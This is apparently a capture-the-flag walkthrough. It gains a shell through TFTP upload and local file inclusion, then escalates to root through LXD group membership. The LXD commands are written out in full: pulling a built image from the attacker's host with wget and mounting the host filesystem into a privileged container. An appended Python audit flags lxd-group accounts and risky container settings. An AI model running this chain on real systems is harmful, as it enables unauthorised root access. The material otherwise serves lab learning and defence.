Included
nmap -sV <target_ip>
sudo nmap -sU --min-rate 5000 <target_ip>
sudo nmap -p tftp --min-rate 5000 <target_ip>
shell.php: replace $ip and $port with your own values.
Then access the uploaded file through the LFI.
The folder where it is stored can be found from passwd, or by googling it.
The default configuration file for tftpd-hpa is /etc/default/tftpd-hpa. The default root directory where files will be stored is /var/lib/tftpboot.
just for convenience os use
Privilege
LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform.
A member of the local “lxd” group can instantly escalate the privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. The vulnerability exists even with the LXD snap package.
Installing Go and other required packages
Download the Alpine YAML
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8
Once the build is done, lxd.tar.xz and rootfs.squashfs will be available in the same folder.
Run in the same folder
Go back to the target system
wget http://{local_IP}:8000/lxd.tar.xz
wget http://{local_IP}:8000/rootfs.squashfs
ls -la
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list
lxc init alpine privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
To access the root flag, we can navigate to the /mnt/root/root folder.
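The Privilege section rests on two conditions an administrator can check for: which accounts can reach LXD through the lxd group, and which instances carry the security.privileged=true and host-root disk settings shown above. The following audit is an added example, not part of the original writeup; the function names are hypothetical, the sample data is constructed, and the inputs are assumed to be the text of /etc/group, /etc/passwd and `lxc config show <instance> --expanded`.

```python
# Added example: audit for the lxd-group path above. Names are hypothetical, data is constructed.

def lxd_capable_accounts(group_text, passwd_text, group="lxd"):
    """Accounts that can reach LXD: supplementary members listed in /etc/group
    plus accounts whose primary GID in /etc/passwd is the group's GID."""
    gid, members = None, set()
    for fields in (l.split(":") for l in group_text.splitlines()):
        if len(fields) >= 4 and fields[0] == group:
            gid = fields[2]
            members.update(m for m in fields[3].strip().split(",") if m)
    for fields in (l.split(":") for l in passwd_text.splitlines()):
        if gid is not None and len(fields) >= 7 and fields[3] == gid:
            members.add(fields[0])
    return sorted(members - {"root"})

def risky_settings(config_yaml):
    """Flag security.privileged=true and disk devices whose source is the host /
    in the text printed by `lxc config show <instance> --expanded`."""
    findings, section, name, dev = [], None, None, {}
    def flush():  # report the device collected so far, if it exposes host /
        if name and dev.get("type") == "disk" and dev.get("source") == "/":
            findings.append(f"{name}: host / mounted at {dev.get('path')}")
    for raw in filter(str.strip, config_yaml.splitlines()):  # skip blank lines
        indent = len(raw) - len(raw.lstrip())
        key, _, val = raw.strip().partition(":")
        val = val.strip().strip('"')
        if indent == 0:                      # new top-level section
            flush()
            section, name, dev = key, None, {}
        elif section == "config" and key == "security.privileged" and val == "true":
            findings.append("security.privileged=true")
        elif section == "devices" and indent == 2:   # new device entry
            flush()
            name, dev = key, {}
        elif section == "devices":           # property of the current device
            dev[key] = val
    flush()
    return findings

GROUP = "root:x:0:\nlxd:x:108:alice\nsudo:x:27:admin\n"             # constructed
PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
          "alice:x:1000:1000::/home/alice:/bin/bash\n"
          "svc:x:1001:108::/home/svc:/bin/sh\n")                    # constructed
CONFIG = ('config:\n  security.privileged: "true"\ndevices:\n  host-root:\n'
          '    path: /mnt/root\n    source: /\n    type: disk\n')   # constructed

if __name__ == "__main__":
    print(lxd_capable_accounts(GROUP, PASSWD), risky_settings(CONFIG))
```

Every account the first function returns should be treated as root-equivalent on the host, including ones like `svc` here that never appear in the group's member list because lxd is their primary group.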